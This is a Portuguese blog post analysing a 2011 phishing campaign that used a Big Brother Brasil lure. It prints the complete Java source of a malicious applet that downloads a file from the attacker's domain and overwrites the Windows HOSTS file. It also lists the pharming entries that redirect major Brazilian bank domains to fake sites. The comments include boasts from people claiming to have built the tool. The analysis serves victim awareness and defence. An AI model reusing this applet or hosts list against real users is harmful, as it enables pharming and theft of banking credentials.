Análise do Phishing: Vídeos BBB 11 Maria faz striptease

Como era de se esperar o programa BBB 11 virou engenharia social para phishing, é só um assunto entrar na mídia que os bankers e spamers já atualizam seus golpes buscando “fisgar” mais vítimas.

Está circulando um e-mail com os campos “De: BBB 11 <contato@oglobo.com>” e “Assunto: Maria faz strip e mostra tudo, veja sem censura!!!”.

Imagem abaixo:


Conforme é possível ver na foto, o e-mail possui um link para o site:

http://globo.videosbbb11.com

Vemos que foi registrado um domínio próprio só para aplicar o golpe, aliás um endereço bastante convincente. Ao clicar no link é aberto o site que tenta executar um Applet Java, o navegador Firefox apresentou uma mensagem de segurança dizendo que não foi possível verificar a assinatura digital do aplicativo.


Para os menos atentos talvez interprete essa mensagem como algo necessário para rodar o vídeo, o fraudador até colocou: “Para visualizar está página corretamente clique em RUN”.

Cliquei em Cancelar e visualizei o código-fonte da página:


Vemos que o site tenta executar o Applet WSD.jar, fiz o download do mesmo e não tive o trabalho nem de descompilar o .class, o .java já estava junto e possuía o seguinte código-fonte:

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.FilePermission;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.URL;
import java.nio.channels.FileChannel;

public class WSD extends Applet {
 private static final long serialVersionUID = 1L;

 public void start() {
  String url = getParameter("url"); 
  if (url != null) {
   String file = "c:/tmp/ip.txt";
   try {
    File pasta = new File("c:/tmp");
    pasta.mkdir();
    new FilePermission("c:/tmp/*", "write");
    download(url, file);
    copy(new File(file));
    pasta.delete();
    
    if(getParameter("email") != null){
     getAppletContext().showDocument(new URL(getParameter("email")), "_self");
    }
   } catch (Exception e) {
    e.printStackTrace();
   }
  }
 }
 
 private void download(String url, String file) throws Exception {
  BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
  PrintWriter p = new PrintWriter(file);
  
  String linha = null;   
  while((linha = br.readLine()) != null) {   
      p.println(linha);
  } 
  
  p.flush();
  p.close();
  br.close();
 }
 
 public void copy(File s) throws IOException {
  FileChannel in = (new FileInputStream(s)).getChannel();
  FileChannel out = (new FileOutputStream(new File("c:/windows/system32/drivers/etc/hosts"))).getChannel();
  in.transferTo(0, s.length(), out);
  in.close();
  out.close();
 }
}


Quando executado ele cria uma pasta temporária no computador da vítima, “c:/tmp/”, copia para ela o arquivo “ip.txt” fazendo download do arquivo pela URL:

http://www.videosbbb11.com/ip.txt

Depois ele copia o conteúdo do arquivo “c:/tmp/ip.txt” para o arquivo HOSTS do windows, localizado em "c:/windows/system32/drivers/etc/hosts". Por fim apaga a pasta temporária.

Interessante que após fazer isso ele realmente abre o vídeo verdadeiro do BBB, através dessa linha:

<param name="email" value="http://75.127.109.43/bbb11.php">

Essa página “bbb11.php” redireciona automaticamente para uma página verdadeira da globo.com que abre o vídeo em questão. Então quem clicou no e-mail para ver o vídeo e autorizou a execução do Applet Java no final realmente vai ver o vídeo, talvez nem perceba que tenha sido vítima de um golpe.

Para quem não conhece, o arquivo HOSTS é utilizado para forçar a resolução de domínio de um site para um determinado IP, o sistema operacional primeiro verifica o arquivo HOSTS para encontrar o IP do site, não encontrando nele busca no servidor DNS. Mais informações no site Linha Defensiva.

Afinal o que há no arquivo “ip.txt” que foi copiado para o HOSTS?


64.186.129.53 www.bradesco.com.br
64.186.129.53 bradesco.com.br
64.186.129.53 www.bancobradesco.com.br
64.186.129.53 bancobradesco.com.br
64.186.152.127 serasa.com.br
64.186.152.127 www.serasa.com.br
64.186.152.127 www.serasaexperian.com.br
64.186.152.127 serasaexperian.com.br
64.186.128.57 www.santander.com.br
64.186.128.57 santander.com.br
64.186.128.57 www.bancosantander.com.br
64.186.128.57 www.real.com.br
64.186.128.57 real.com.br
64.186.128.57 www.bancoreal.com.br
64.186.128.57 bancoreal.com.br
64.186.129.40 caixa.com.br
64.186.129.40 www.caixa.com.br
64.186.129.40 caixa.gov.br
64.186.129.40 www.caixa.gov.br
64.186.129.40 cef.com.br
64.186.129.40 www.cef.com.br
64.186.129.40 cef.gov.br
64.186.129.40 www.cef.gov.br
64.186.134.29 www.bb.comb.br
64.186.134.29 bb.com.br
64.186.134.29 www.bancodobrasil.com.br
64.186.134.29 bancodobrasil.com.br
64.186.134.29 www.bancobrasil.com.br
64.186.134.29 bancobrasil.com.br
64.186.134.29 www.bbrasil.com.br
64.186.134.29 bbrasil.com.br

Isso quer dizer que quando a vítima digitar essas URLs de sites bancários ela será redirecionada para esses IPs que hospedam páginas falsas dos bancos. Vejam algumas:

Bradesco


Serasa


Santander


Banco do Brasil


Cuidado, se você clicou nesse e-mail verifique seu arquivo HOSTS para ver se não foi alterado, se estiver alterado e você acessou algum desses sites bancários você pode ter sido vítima do golpe.


Até a próxima!

Ronaldo Lima
crimesciberneticos.com | twitter.com/crimescibernet

8 comentários:

  1. Muito bom, obrigado pela orientacao

    ResponderExcluir
  2. sou membro da RE-B, sou o F34R. cara muito boa sua analise tá de parabens. tem que pegar os caras que fazem isso e comer o #$ com areia vey.

    ResponderExcluir
  3. Nuss, muito bom! Realmente essa era uma tática que eu nunca tinha pensado. Por isso Linux é mais seguro, não é qualquer conta que altera o arquivo "hosts".

    ResponderExcluir
  4. Na realidade é facil fazer esse "jar" o site do scriptkid também contém o fonte inteiro vocês mesmos podem editar... ele e deixar em qualquer site de vocês que ira fazer o msm processo, duro que pessoas desavidasas clicam rapidamente em tudo pensando que vai resolver e abrir o video nesse momento o hosts acredito eu é editado :(

    ResponderExcluir
  5. Boa noite,
    Sou o dono do auto-infect, espero que tenham gostado de minha ideia, pensei em tudo com carinho, peguei um pouquinho bom de gente :D

    teve bacanaaaaa
    auhauhhua
    qualquer coisa so procurar por V3noM ;D

    ResponderExcluir
  6. V3noM você não é o autor do auto infect, esse applet foi criado na verdade em uma aplicação web normal para executar um applet de uma loja! Mais nós editamos e ai está o resultado!

    www.anonymousul.com.br ,

    ResponderExcluir
  7. Pessoal, estou com esse problema, mas como resolvo? não consigo simplesmente pagar os sites e ips pq ao reininciar volta tudo de novo.. e não consigo resolver isso, alguem pode me ajudar??
    caso alguem possa, Aqui meu email -> x-souza@hotmail.com

    ResponderExcluir

Related Posts Plugin for WordPress, Blogger...